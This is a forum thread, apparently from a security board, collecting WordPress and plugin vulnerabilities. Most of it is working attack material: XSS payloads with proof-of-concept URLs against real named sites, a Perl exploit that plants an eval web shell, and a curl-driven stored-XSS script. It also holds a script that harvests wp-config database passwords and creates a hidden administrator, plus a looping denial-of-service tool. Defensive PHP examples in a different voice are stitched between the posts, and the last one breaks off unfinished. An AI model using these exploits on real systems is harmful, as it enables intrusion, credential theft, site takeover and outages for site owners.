[ Overview of WordPress vulnerabilities ]

Discussion in 'Web vulnerabilities' started by ettee, 5 Oct 2007.

  1. eLWAux

    WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln

    http://wordpress.org/extend/plugins/advanced-twitter-widget/
    \advanced-twitter-widget.php

    (c)eLwaux 30.06.2009, uasc.org.ua

    PHP:
    89:  if($_POST['advanced_twitter_widget_value']!=""){
    90:              $xArrOptions[0]=  $_POST['advanced_twitter_widget_title'];
    91:              $xArrOptions[1]=  $_POST['advanced_twitter_widget_value'];
    92:              $xArrOptions[2]=  $_POST['advanced_twitter_widget_type'];
    93:              $xArrOptions[3]=  $_POST['advanced_twitter_widget_count'];
    94:              update_option('advanced_twitter_widget_options', serialize($xArrOptions));
    95:  }
    97:          $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
    101:            $xTitle = $xArrOptions[0];
    102:            $xValue = $xArrOptions[1];
    103:            $xType =  $xArrOptions[2];
    104:            $xCount = $xArrOptions[3];
    111:           Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
    112:           Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
    exploit:
    Code:
    	POST: advanced_twitter_widget_value=">{XSS1}<a "
    	POST: advanced_twitter_widget_title=">{XSS2}<a "
    	POST: advanced_twitter_widget_type=.
    	POST: advanced_twitter_widget_count=.
     
  2. eLWAux

    WordPress Plugin ImHuman 0.0.9 XSS Vuln

    http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
    \imhuman.php

    (c)eLwaux 30.06.2009, uasc.org.ua

    PHP:
    151:    if(isset( $_POST['do'] )) {
    152:        if ( function_exists('current_user_can') && !current_user_can('manage_options') )
    153:            die(__('Cheatin’ uh?'));
    154:        check_admin_referer($plugin_page);
    155:        
    156:        $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
    157:        $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
    158:        $t['imhuman_row'] = $_POST['imhuman_row'];
    159:        $t['imhuman_col'] = $_POST['imhuman_col'];
    160:        $t['imhuman_sel'] = $_POST['imhuman_sel'];
    161:        $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
    162:        $t['imhuman_word'] = $_POST['imhuman_word'];
    163:        $t['imhuman_lang'] = $_POST['imhuman_lang'];
    164:        update_option( 'imhuman_options', $t );
    165:        $m = '<p>Settings Saved!</p>';
    166:    }
    167:    $options = get_option( 'imhuman_options' );
    ....
    194:    <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
    195:    </tr>
    196:    <tr>
    197:        <th><?php _e('ImHuman Ap? Key'); ?></th>
    198:        <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
    exploit:
    Code:
    	POST: do=.
    	POST: imhuman_api_user=">{XSS1}<a "
    	POST: imhuman_api_key=">{XSS1}<a "
    	POST: imhuman_row=.
    	POST: imhuman_col=.
    	POST: imhuman_sel=.
    	POST: imhuman_word=.
    POST: imhuman_lang=.
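The two advisories above (Advanced Twitter Widget and ImHuman) share one shape: a settings value goes from `$_POST` into the options store and is later echoed back into an `<input value="">` unescaped. The following is an added example, not code from either plugin or from WordPress, showing the same save-and-render cycle with the missing steps. In a plugin the equivalents are `current_user_can('manage_options')`, `check_admin_referer()`, `sanitize_text_field()` on input and `esc_attr()` on output; plain PHP 8 is used here so the file runs from the CLI without WordPress. The input values are constructed from the payload shape in the advisory.

```php
<?php
// Added example (not plugin or WordPress code): capability + CSRF token check,
// input normalisation, and attribute-context escaping on output.
declare(strict_types=1);

/** Input side: one line of text, no control characters, bounded length. Arrays become ''. */
function sanitize_setting(mixed $raw, int $maxLen = 200): string {
    if (!is_string($raw)) {
        return '';                                   // ?x[]=... must never reach serialize()
    }
    $v = preg_replace('/[\x00-\x1F\x7F]/', '', $raw);
    return mb_substr(trim($v), 0, $maxLen);
}

/** Output side, HTML attribute context: what WordPress esc_attr() does. */
function esc_attribute(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** The POST handler. Returns the option set to store, or null when the request is refused. */
function handle_save(array $post, bool $canManageOptions, bool $nonceValid): ?array {
    if (!$canManageOptions || !$nonceValid) {        // capability and CSRF token come first
        return null;
    }
    $type = $post['advanced_twitter_widget_type'] ?? 'user';
    return [
        'title' => sanitize_setting($post['advanced_twitter_widget_title'] ?? ''),
        'value' => sanitize_setting($post['advanced_twitter_widget_value'] ?? ''),
        'type'  => in_array($type, ['user', 'search'], true) ? $type : 'user',   // allow-list
        'count' => max(1, min(50, (int) ($post['advanced_twitter_widget_count'] ?? 5))),
    ];
}

/** Render the stored title back into the form (the plugin's lines 111-112, done safely). */
function render_title_field(string $storedTitle): string {
    return 'Title:<br/><input type="text" name="advanced_twitter_widget_title" value="'
        . esc_attribute($storedTitle) . '" /><br/>';
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed input using the payload shape from the advisory above.
$post = [
    'advanced_twitter_widget_title' => '">{XSS2}<a "',
    'advanced_twitter_widget_value' => ['not', 'a', 'string'],
    'advanced_twitter_widget_type'  => 'bogus',
    'advanced_twitter_widget_count' => '999',
];
check(handle_save($post, false, true) === null, 'non-admin refused');
check(handle_save($post, true, false) === null, 'missing nonce refused');
$opts = handle_save($post, true, true);
check($opts === ['title' => '">{XSS2}<a "', 'value' => '', 'type' => 'user', 'count' => 50], 'normalised options');
$html = render_title_field($opts['title']);
check(str_contains($html, 'value="&quot;&gt;{XSS2}&lt;a &quot;"'), 'attribute cannot be closed early');
echo $html, "\n";
```

The stored title is kept as the user typed it; the escaping happens at the point where the value is written into HTML, so the same option can later be printed into a text node or a JavaScript string with the escaper for that context instead.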
     
  3. eLWAux

    WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
     
  4. eLWAux

    WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
     
  5. eLWAux

    WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
    Code:
    WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
    http://wordpress.org/extend/plugins/wordpress-toolbar/
    http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
    
    Dork: "inurl:wp-toolbar.php"
    
    ## ## ## ##
    
    eLwaux(c)2009 UASC.org.ua
    
    ## ## ## ##
    
    Path Disclosure
    
    /wp-content/plugins/wordpress-toolbar/wp-toolbar.php
    ( call to undefined function add_action() )
    -----------------------------------------------------------------
    1:  <?php
    12: include_once("socialsites.php");
    14: add_action('admin_menu','wordpress_toolbar_admin');
    -----------------------------------------------------------------
    
    example:
     http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
    
    
    ## ## ## ##
    
    XSS
    
    /wp-content/plugins/wordpress-toolbar/toolbar.php
    -----------------------------------------------------------------
    30:    $tourl = $_GET['wp-toolbar-tourl'];
    42:    $blogtitle = $_GET['wp-toolbar-blogtitle'];
    52:       <title><?php echo $blogtitle; ?> - Toolbar</title>
    56:       <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
    -----------------------------------------------------------------
    
    PoC: 
     wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
     wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
    
    example:
     http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
     http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
     http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
     
  6. devscripts

    Stuff like this isn't worth publishing, since it's in practically every WordPress plugin and include file ;D
     
  7. eLWAux

    Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
    you need the admin's login:password :D

    Code:
    Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
    ------------
    http://wordpress.org/extend/plugins/add-uroksu-catalog/
    Add UROK.su Catalog
    Version: 1.03
    ------------
    
    \wp-content\plugins\add-uroksu-catalog\urok.su.class.php
    ----------------------------------------------------------------------
    |56|  if (isset($_POST['UPDATE'])) {
    |57|     $MyUROKsu_user=$_REQUEST['login'];
    |58|     $file_name=$file_name=dirname(__FILE__).'/login.txt';
    |59|     $w=fopen($file_name,'w');
    |60|     fwrite($w,$MyUROKsu_user);
    |61|     fclose($w);
    |62|     print($this->update_catalog($MyUROKsu_user));
    |63|     echo '</p>';
    |64|  }
    ----------------------------------------------------------------------
    
    Steps to code execution:
    1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
       POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
       (your code will be saved to file:
        /wp-content/plugins/add-uroksu-catalog/login.txt)
    2) include this file & code execute:
       /wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
    
    perl exploit:
    ----------------------------------------------------------------------
    PHP:
        #! /usr/bin/perl -w

        use LWP::UserAgent;
        use warnings;

        print "\n  WP ] add-uroksu-catalog < 1.03 [ exploit\n";
        print "  eLwaux(c)uasc 2009\n\n";

        if (!$ARGV[2]) {
            print "  usage:\n".
                  "     expl.pl http://site.com/wp/index.php adminLogin adminPass\n";
            exit(0);
        }

        my $mHost = $ARGV[0];
        my $mAdmL = $ARGV[1];
        my $mAdmP = $ARGV[2];

        #$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
        #$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;

        my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);

        my $UA = LWP::UserAgent->new;
        $UA->timeout(20);
        $UA->default_header('Referer' => $mHost.'wp-login.php');
        $UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');
             
        # login to WP
        my $page = $UA->post($mHost.'wp-login.php',
                       {
                             log         =>  $mAdmL,
                             pwd         =>  $mAdmP,
                            # rememberme  =>  'forever',
                             submit      =>  'Войти',
                             redirect_to =>  $mHost.'wp-admin/',
                             testcookie  =>  1
                       }
                   )->as_string;
        my $cookie = '';
        my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
        foreach my $SC (@SetCookie) {
             $cookie .= $SC.';';
        }
        if (length($cookie)<100) {
             print '  -   bad login:password!';
             exit(0);
        }
        print '  -   good login:password!'."\n";
        $UA->default_header('Cookie' => $cookie);


        print ' ..   sending exploit..'."\n";
        # send EXPLOIT
        $page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
                       {
                             login       =>  '<?php @eval($_GET[\'c\']);?>',
                             UPDATE      =>  1
                       }
                   )->as_string;
        print '  +   exploit send!'."\n";

        # try execute simple code
        $page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
        if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
             print '  +   result of test1: '.$1."\n";
             print '  +   result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
        } else {
             print '  -   perhaps code is not injected!'."\n";
        }

        print '  !   FINISH!'."\n\n";
        print ' !!   your shell:'."\n";
        print '      '.$mHost."\n".
              '      '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";

        exit(0);
    ----------------------------------------------------------------------
    
    
    
    simple result on localhost:
    ----------------------------------------------------------------------
    > expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
    
      WP ] add-uroksu-catalog < 1.03 [ exploit
      eLwaux(c)uasc 2009
    
      -   good login:password!
     ..   sending exploit..
      +   exploit send!
      +   result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
      +   result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
      !   FINISH!
    
     !!   your shell:
          http://localhost/cms/wordpress/
          wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
    ----------------------------------------------------------------------
     
    #127 eLWAux, 15 Jul 2009
    Last edited: 15 Jul 2009
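The chain in the post above needs two things: attacker-controlled bytes written into a file under the plugin directory, and an `admin.php?page=` include that accepts any plugin-relative path. The following is an added example, not code from the plugin or from WordPress core, showing the two counter-measures: an include resolver that only loads registered pages and verifies the resolved file after `realpath()`, and a settings writer that keeps user input in an options store (simulated by a JSON file outside the include root) rather than in an includable file. The slug `urok-settings`, the file `settings-page.php` and the options file name are assumptions made for the example; it needs PHP 8.

```php
<?php
// Added example (not plugin or WordPress code): allow-listed page includes and
// user input kept out of includable files.
declare(strict_types=1);

/** Map of menu slugs to the files they load (what registering a menu page would record). */
function registered_pages(string $pluginRoot): array {
    return ['urok-settings' => $pluginRoot . '/settings-page.php'];   // assumed slug/file
}

/**
 * Resolve a ?page= value to a file. Returns null unless the slug is registered
 * AND the registered file really lives under the plugin root (realpath guards
 * against symlinks and ../ in the registration itself).
 */
function resolve_page(string $slug, string $pluginRoot): ?string {
    $pages = registered_pages($pluginRoot);
    if (!array_key_exists($slug, $pages)) {
        return null;                       // 'add-uroksu-catalog/login.txt' is not a page
    }
    $root = realpath($pluginRoot);
    $file = realpath($pages[$slug]);
    if ($root === false || $file === false || !str_starts_with($file, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $file;
}

/** Store the catalog login in an options store, never in a file under the plugin dir. */
function save_catalog_login(string $raw, string $optionsFile): string {
    $login = preg_replace('/[^A-Za-z0-9_.@-]/', '', $raw);   // allow-listed characters only
    $login = substr($login, 0, 64);
    $opts = is_file($optionsFile) ? (json_decode((string) file_get_contents($optionsFile), true) ?: []) : [];
    $opts['MyUROKsu_user'] = $login;
    file_put_contents($optionsFile, json_encode($opts), LOCK_EX);
    return $login;
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed layout: a throw-away plugin directory with one registered page.
$tmp = sys_get_temp_dir() . '/include_example_' . bin2hex(random_bytes(4));
mkdir($tmp . '/plugin', 0700, true);
file_put_contents($tmp . '/plugin/settings-page.php', "<?php // settings page\n");
$root = $tmp . '/plugin';

check(resolve_page('urok-settings', $root) === realpath($root . '/settings-page.php'), 'registered slug resolves');
check(resolve_page('add-uroksu-catalog/login.txt', $root) === null, 'unregistered path refused');
check(resolve_page('../../../etc/passwd', $root) === null, 'traversal refused');

$stored = save_catalog_login("<?php @eval(\$_GET['c']);?>", $tmp . '/options.json');
check(!str_contains($stored, '<?'), 'no PHP open tag can be stored');
check(!file_exists($root . '/login.txt'), 'nothing written under the plugin directory');

unlink($tmp . '/options.json');
unlink($root . '/settings-page.php');
rmdir($root);
rmdir($tmp);
echo "all checks passed\n";
```

The character allow-list is the simpler of the two controls, but it is the include resolver that removes the whole class: once only registered files can be loaded, the contents of `login.txt` no longer matter to the include path.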
  8. [underwater]

    XSS [All versions]
    An XSS was published today; it works up to and including the current version.

    Code:
    http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
    To fix it, change line ~40 in wp-comments-post.php:
    Code:
    $comment_author_url = str_replace(chr(39),'',$comment_author_url);
    $comment_author_url = str_replace(chr(59),'',$comment_author_url);
    $comment_author_url = str_replace(chr(44),'',$comment_author_url);
     
    #128 [underwater], 22 Jul 2009
    Last edited: 22 Jul 2009
  9. Solide Snake

    Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit

    This can be used to hack 2.8.1 through Remote XSS.

    Code:
    echo "wp281.quickprz // iso^kpsbr"
    
    SITE=$1
    POSTID=$2
    MESSAGE="h4x0riZed by the superfreakaz0rz"
    
    if [ "X$SITE" = "X" ]; then
    	echo "$0 <url> [postID]"
    	echo "f.e. $0 www.worstpress.eu"
    	exit
    fi
    
    if [ "X$POSTID" = "X" ]; then
    	POSTID=1
    fi
    
    
    echo "[+] building payload"
    
    WHERE="title" # can also be 'content'
    PATH="$SITE/wp-comments-post.php"
    
    WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`
    EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
    echo "[-] payload is $EVILURL for '$MESSAGE'"
    
    EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
    MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
    RNDDATA=`/bin/date +%S%s`;
    
    echo "[!] delivering data"
    /usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&[email protected]&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH
    
    echo "[X] all done. now wait for admin to mouse-over that name."
    
    # milw0rm.com [2009-07-24]
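Three posts in this thread (the toolbar plugin's `<title>` and iframe `src`, and the comment author URL in the 2.8.x posts just above) print user input into two different HTML contexts: a text node and a URL inside an attribute. The core patch quoted earlier strips three characters, which is a deny-list. The following is an added example, not code from the toolbar plugin, from WordPress core or from any of the posts, that does the opposite: allow-list the URL (absolute http/https only, ASCII host, no quotes or whitespace) and then escape for the exact context the value is written into. `esc_text()` is what `esc_html()`/`esc_attr()` do in WordPress; the render functions are stand-ins for the template lines, and the inputs are constructed from the PoC shapes in the thread. PHP 8 is assumed.

```php
<?php
// Added example (not plugin or WordPress code): context-aware output escaping
// plus URL allow-listing for href=/src= values.
declare(strict_types=1);

/** Text-node or attribute context, equivalent to WordPress esc_html()/esc_attr(). */
function esc_text(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Allow-list validation for a URL that will end up in href= or src=.
 * Returns '' when the value should not be rendered at all.
 */
function safe_url(string $raw): string {
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > 2048) {
        return '';
    }
    if (preg_match('/[\x00-\x20"\'<>\\\\]/', $raw)) {      // quotes, whitespace, control chars
        return '';
    }
    $p = parse_url($raw);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return '';                                           // relative or schemeless: reject
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return '';                                           // javascript:, data:, ... rejected
    }
    if (!preg_match('/^[A-Za-z0-9.-]+$/', $p['host'])) {
        return '';                                           // ASCII hostnames only (punycode for IDN)
    }
    return $raw;
}

/** toolbar.php line 52, done safely. */
function render_title(string $blogtitle): string {
    return '<title>' . esc_text($blogtitle) . ' - Toolbar</title>';
}

/** toolbar.php line 56, done safely: no iframe at all for a rejected URL. */
function render_iframe(string $tourl): string {
    $url = safe_url($tourl);
    if ($url === '') {
        return '<p>Invalid target URL.</p>';
    }
    return '<iframe frameborder="0" src="' . esc_text($url) . '"></iframe>';
}

/** Comment author link as a comment template would print it. */
function render_author_link(string $author, string $authorUrl): string {
    $url = safe_url($authorUrl);
    if ($url === '') {
        return esc_text($author);                            // plain name, no link
    }
    return '<a href="' . esc_text($url) . '" rel="nofollow">' . esc_text($author) . '</a>';
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed inputs built from the PoC shapes in this thread.
check(!str_contains(render_title('</title>{XSS}'), '</title>{XSS}'), 'title breakout escaped');
check(render_iframe('">{XSS}<div id="') === '<p>Invalid target URL.</p>', 'quote in URL rejected');
check(render_iframe('javascript:alert(1)') === '<p>Invalid target URL.</p>', 'javascript: rejected');
check(render_iframe('https://example.com/page?x=1')
      === '<iframe frameborder="0" src="https://example.com/page?x=1"></iframe>', 'good URL kept');
check(render_author_link('bob', "http://www.site.com'onmousemove='location.href=1") === 'bob', 'attribute breakout rejected');
check(render_author_link('bob', 'http://www.site.com/') === '<a href="http://www.site.com/" rel="nofollow">bob</a>', 'good author URL kept');
echo "all checks passed\n";
```

Two design points: the attribute is always double-quoted and its value always passes through `esc_text()`, so even a URL that slipped past `safe_url()` could not terminate the attribute; and a rejected URL produces no link rather than a mangled one, which also makes the rejection visible in the rendered page.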
     
  10. fairy_long_nose

    -1
    Doesn't work
     
  11. [underwater]

    WP-Config Discover
    Code:
    <?php
    $paths = array(
        "blog",
        "site",
        "html",
        "www",
        "html/blog",
        "www/blog",
        "site/blog",
        "wordpress",
        "wp",
        "www/wp",
        "www/wordpress",
        "html/wordpress",
        "html/wp",
        "public_html",
        "public_html/blog",
        "public_html/wp",
        "public_html/wordpress",
    );
    $files = array(
        "wp-config.php",
    );
    print "Checking for ....\n";
    if(!is_readable("/etc/passwd"))    die("err0r: can't read /etc/passwd (safe mode?)");
    $_f = @file("/etc/passwd");
    foreach($_f as $usr){
        $usr = explode(":", $usr);
        $uid = $usr[2];
        $home = $usr[5];
        $usr = $usr[0];
        if($uid >= 1000){
            print $usr." (uid:".$uid."): ".$home."\n";
            foreach($paths as $path){
                if(file_exists($home."/".$path)) {
                    print "\tSearching in ".$home."/".$path."\n";
                    foreach($files as $file){
                        if(file_exists($home."/".$path."/".$file)){
                            print "\t\tFound: ".$file."\n";
                            $__f = @file($home."/".$path."/".$file);
                            foreach($__f as $line){
                                if(stristr($line, "DB_USER")) { preg_match_all('/define\(\'(.*)\);/', $line, $output); print "\t\t\t".str_replace("DB_USER', ","usr=>", $output[1][0])."\n"; }
                                if(stristr($line, "DB_PASSWORD")) { preg_match_all('/define\(\'(.*)\);/', $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD', ", "pwd=>", $output2[1][0])."\n"; }
                                if(stristr($line, "DB_NAME")) { preg_match_all('/define\(\'(.*)\);/', $line, $output3); print "\t\t\t".str_replace("DB_NAME', ", "db=>", $output3[1][0])."\n"; }
                                if(stristr($line, "DB_HOST")) { preg_match_all('/define\(\'(.*)\);/', $line, $output4); print "\t\t\t".str_replace("DB_HOST', ", "host=>", $output4[1][0])."\n"; }
                                if(stristr($line, "\$table_prefix")) { preg_match_all('/\$table_prefix(.*);/', $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; }
                                flush();
                            }
                            print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                            if($_GET['attack'] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                            if($_GET['attack'] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                            flush();
                        }
                    }
                }
                flush();
            }
            flush();
        }
    }
    function getURL($user, $pass, $db, $host, $prefix){
        preg_match_all('/, \'(.*)\'/', $user, $user); $user = $user[1][0];
        preg_match_all('/, \'(.*)\'/', $pass, $pass); $pass = $pass[1][0];
        preg_match_all('/, \'(.*)\'/', $db, $db); $db = $db[1][0];
        preg_match_all('/, \'(.*)\'/', $host, $host); $host = $host[1][0];
        preg_match_all('/\'(.*)\'/', $prefix, $prefix); $prefix = $prefix[1][0];
        $sql = @mysql_connect($host, $user, $pass);
        @mysql_select_db($db);
        $_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name='siteurl'", $sql);
        @mysql_close($sql);
        return @mysql_result($_q, 0, 'option_value');
    }

    function UserAdmin($action, $user, $pass, $db, $host, $prefix){
        preg_match_all('/, \'(.*)\'/', $user, $user); $user = $user[1][0];
        preg_match_all('/, \'(.*)\'/', $pass, $pass); $pass = $pass[1][0];
        preg_match_all('/, \'(.*)\'/', $db, $db); $db = $db[1][0];
        preg_match_all('/, \'(.*)\'/', $host, $host); $host = $host[1][0];
        preg_match_all('/\'(.*)\'/', $prefix, $prefix); $prefix = $prefix[1][0];
        $sql = @mysql_connect($host, $user, $pass);
        @mysql_select_db($db);
        if($action == "create"){
            $wp_uid = rand(9990,99999);
            @mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", 'fakeadmin', md5('dummie'), 'wordpress', '[email protected]', 'http://', NOW(), '', 0, 'wordpressdummieadmin')", $sql);
            @mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' )", $sql);
        }
        if($action == "delete"){
            mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login='fakeadmin')", $sql);
            mysql_query("DELETE FROM ".$prefix."users WHERE user_login='fakeadmin'", $sql);
        }
        @mysql_close($sql);
        return "fakeadmin/dummie";
    }
    ?>
    
    
     
  12. [underwater]

    A serious hole was found in the file WP-trackbacks.php. The vulnerability is that any visitor can bring the site down with literally 20 requests.

    Open the file WP-trackbacks.php:
    Code:
    if ( function_exists('mb_convert_encoding') ) { // For international trackbacks
    $title     = mb_convert_encoding($title, get_option('blog_charset'), $charset);
    $excerpt   = mb_convert_encoding($excerpt, get_option('blog_charset'), $charset);
    $blog_name = mb_convert_encoding($blog_name, get_option('blog_charset'), $charset);
    }
    $charset is passed in via $_POST['charset']. And the whole problem lies in how mb_convert_encoding handles the encoding

    Code:
    $text = mb_convert_encoding($text,'UTF-8','UTF-7,ISO-8859-1');
    This function converts $text to UTF-8. But if we do this:
    Code:
    $text = mb_convert_encoding($text,'UTF-8','ISO-8859-1,ISO-8859-1,ISO-8859-1,ISO-8859-1');
    mb_convert_encoding will try to detect the encoding of $text and will check whether it is ISO-8859-1, over and over again. The exploit had already been written before me:
    Code:
        <?php
        //wordpress Resource exhaustion Exploit
        // by rooibo
        //[email protected] contacted and get a response,
        //but no solution available.
        if(count($argv) < 2) {
        echo "You need to specify a url to attack\n";
        exit;
        }
    
        $url = $argv[1];
    
        $data = parse_url($url);
        if(count($data) < 2) {
        echo "The url should have http:// in front of it, and should be complete.\n";
        exit;
        }
    
        if(count($data) == 2) {
        $path = '';
        } else {
        $path = $data['path'];
        }
        $path = trim($path,'/');
        $path .= '/wp-trackback.php';
        if($path[0] != '/') {
        $path = '/'.$path;
        }
    
        $b = "";
        $b = str_pad($b,140000,'ABCEDFG');
        $b = utf8_encode($b);
        $charset = "";
        $charset = str_pad($charset,140000,"UTF-8,");
    
        $str = 'charset='.urlencode($charset);
        $str .= '&url=www.example.com';
        $str .= '&title='.$b;
        $str .= '&blog_name=lol';
        $str .= '&excerpt=lol';
    
        $count = 0;
        while(1) {
        $fp = @fsockopen($data['host'],80);
        if(!$fp) {
        if($count > 0) {
        echo "down!!!!\n";
        exit;
        }
        echo "unable to connect to: ".$data['host']."\n";
        exit;
        }
    
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
    
        echo "hit!\n";
        $count++;
        }
    
        ?>
    Run it like this: php exploit.php http://site.com

    To patch it, open the file WP-trackbacks.php and find the line:
    Code:
    $charset = $_POST['charset'];
    Replace it with:
    Code:
    $charset = str_replace(",", "", $_POST['charset']);
    if(is_array($charset)) { exit; }
     
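The patch above strips commas from the `charset` field, which blocks the comma-separated list that makes `mb_convert_encoding()` run its detector once per candidate over a 140 KB body. The following is an added example, not WordPress code, that takes the allow-list route instead: the field must be a single encoding name that mbstring itself reports as supported, or the blog charset is used and no detection happens at all. The `convert_trackback_field()` wrapper is a stand-in for the conversion lines quoted above.

```php
<?php
// Added example (not WordPress code): allow-list the trackback charset so
// mb_convert_encoding() never receives a list or 'auto'.
declare(strict_types=1);

/**
 * Return a single supported encoding name, or null. Rejects arrays, lists such
 * as 'UTF-8,UTF-8,...', 'auto', and names mbstring does not know.
 */
function sanitize_charset(mixed $raw, int $maxLen = 40): ?string {
    if (!is_string($raw)) {
        return null;                            // charset[]=... arrives as an array
    }
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > $maxLen || !preg_match('/^[A-Za-z0-9_-]+$/', $raw)) {
        return null;                            // no commas, no spaces, bounded length
    }
    if (strcasecmp($raw, 'auto') === 0) {
        return null;                            // 'auto' also triggers detection
    }
    static $known = null;
    if ($known === null) {
        // mb_list_encodings() gives canonical names; compare case-insensitively
        $known = array_change_key_case(array_flip(mb_list_encodings()), CASE_LOWER);
    }
    return isset($known[strtolower($raw)]) ? $raw : null;
}

/** The conversion step from wp-trackback.php, with a validated charset. */
function convert_trackback_field(string $value, ?string $charset, string $blogCharset = 'UTF-8'): string {
    if ($charset === null) {
        $charset = $blogCharset;                // fall back instead of detecting
    }
    $out = mb_convert_encoding($value, $blogCharset, $charset);
    return is_string($out) ? $out : '';
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

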